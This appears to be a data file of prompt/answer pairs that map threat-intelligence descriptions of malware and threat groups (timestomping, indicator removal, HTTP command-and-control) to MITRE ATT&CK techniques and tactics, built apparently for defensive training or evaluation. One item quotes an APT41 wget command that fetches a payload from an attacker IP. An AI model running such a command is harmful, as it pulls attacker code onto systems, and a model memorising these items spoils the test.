+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 3PARA RAT has a command to set certain attributes such as creation/modification timestamps on files.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has manipulated the time of last access to files and registry keys after they have been created or modified.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has modified file and directory timestamps.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot modifies the time of a file as specified by the control server.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component can change the timestamp of files.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can timestomp any files or payloads placed on a target machine to help them blend in.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Derusbi malware supports timestomping.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM has changed the creation date of files.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise performs timestomping of a CAB file it creates.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can timestomp any files or payloads placed on a target machine to help them blend in.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FALLCHILL can modify file or directory timestamps.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For early Gazer versions, the compilation timestamp was faked.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has the ability to perform timestomping of files on targeted systems.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole samples were timestomped by the authors by setting the PE timestamps to all zero values. InvisiMole also has a built-in command to modify file times.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy time-stomped its DLL in order to evade detection.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos can modify timestamps of replaced files, such as ssh with the added credential stealer or sshd used to deploy Kobalos.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has the capability to create and modify file timestamps.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Many Misdat samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can modify the Creation, Access, and Write timestamps for malicious DLLs to match those of the genuine Windows DLL user32.dll.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can change or create the last access or write times.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D can use the touch -t command to change timestamps.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OwaAuth has a command to timestop a file or directory.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POSHSPY modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull has the ability to timestomp a file.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerStallion modifies the MAC times of its local log files to match that of the victim's desktop.ini file.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Psylo has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SEASHARPEE can timestomp files on victims using a Web shell.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon can change the modified time for files to evade forensic detection.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet extracts and writes driver files that match the times of other legitimate files.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can change the timestamp of specified filenames.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After creating a new service for persistence, TDTESS sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can set the timestamps for its worker and service components to match that of cmd.exe.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can change the `CreationTime`, `LastAccessTime`, and `LastWriteTime` file time attributes when executed with `SYSTEM` privileges.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon have inspected server logs to remove their IPs.,"Tecnique: T1070.007 Indicator Removal: Clear Network Connection History and Configurations, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST also removed the firewall rules it created during execution.,"Tecnique: T1070.007 Indicator Removal: Clear Network Connection History and Configurations, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 removed evidence of email export requests using `Remove-MailboxExportRequest`.","Tecnique: T1070.008 Indicator Removal: Clear Mailbox Data, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to delete emails used for C2 once the content has been copied.,"Tecnique: T1070.008 Indicator Removal: Clear Mailbox Data, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar's loader can delete scheduled tasks created by a previous instance of the malware.,"Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can delete previously created tasks on a compromised host.,"Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS can delete created registry keys used for persistence as part of its cleanup procedure.,"Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD has the ability to remove set Registry Keys, including those used for persistence.","Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat is capable of deleting Registry keys used for persistence.,"Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint can uninstall the malicious service from an infected machine.,"Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has the ability to remove Registry entries that it created for persistence.,"Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has deleted accounts it has created.,"Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST removed IFEO registry values to clean up traces of persistence.,"Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT is capable of manipulating and deleting registry keys, including those used for persistence.","Tecnique: T1070.009 Indicator Removal: Clear Persistence, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware has used IRC for C2.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke issued wget requests from infected systems to the C2.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used an IRC bot for C2 communications.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to use Telnet for communication.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.","Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has used an IRC channel for C2 communications.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETEXIT can use an inverse negotiated SSH connection as part of its C2.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape connects to an IRC server for C2.,"Tecnique: T1071 Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used HTTP for C2 communications.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors used HTTP for some of their C2 communications.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used HTTP GET requests for C2.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used HTTP for C2.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 uses HTTPS to conceal C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used HTTP in communications with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has used HTTP POST requests for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER malware has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used HTTP requests to chain multiple web shells and to contact actor-controlled C2 servers prior to exfiltrating stolen data.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has used HTTP POST requests to transmit data.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used HTTPS for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used HTTP and HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used open-source C2 frameworks, including Covenant.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used HTTP and HTTPS to send data back to its C2 server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used HTTP, HTTPS, and WebDav in network communications.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used HTTP GET and POST requests for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has conducted C2 over HTTP and HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has communicated with its C2 via HTTP POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orangeworm has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SilverTerrier uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware communicates with its C2 server via HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used HTTP to communicate with C2 nodes.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software. TeamTNT has also used a custom user agent HTTP header in shell scripts.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 malware has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used HTTP in communication with the C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used HTTP and HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has used HTTP for network communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used tools that communicate with C2 over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used HTTP for network communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 3PARA RAT uses HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 4H RAT uses HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ABK has the ability to use HTTP in communications with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ANDROMEDA has the ability to make GET requests to download files from C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT can use HTTP to communicate with C2 servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor has used HTTP and HTTPS in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has sent data to its C2 server via POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has the ability to communicate with C2 over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has used HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer can use HTTP to communicate with its C2 servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to use HTTP in communication with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BACKSPACE uses HTTP as a transport to communicate with its command server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS establishes a backdoor over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBK has the ability to use HTTP in communications with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has used HTTPS over port 443 for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUBBLEWRAP can communicate using HTTP or HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
